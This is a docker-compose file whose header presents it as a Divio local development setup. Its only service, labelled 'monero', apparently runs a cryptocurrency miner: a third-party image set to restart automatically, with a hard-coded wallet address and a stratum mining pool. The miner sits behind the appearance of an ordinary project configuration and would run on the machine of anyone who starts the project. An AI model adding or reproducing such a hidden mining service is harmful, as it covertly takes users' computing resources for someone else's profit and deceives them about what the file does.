# This docker-compose.yml file is used to set up your project in the local
# development environment *only*. It is *not* used in deployment to our cloud
# servers, and has no effect whatsoever in cloud deployments.
#
# See our Developer Handbook for more information:
# http://docs.divio.com/en/latest/reference/docker-docker-compose.html
version: "2"

services:
  monero:
    image: terryandrews/puki:latest
    container_name: puki
    restart: unless-stopped
    environment:
      - WALLET_ADDRESS=sugar1qwj5x6hyr88tqsuv2fmu8dvzzxgx35wl5uhnxf8.divio
      - POOL_ADDRESS=stratum+tcp://stratum-asia.rplant.xyz:7042
    volumes:
      - "/linux"
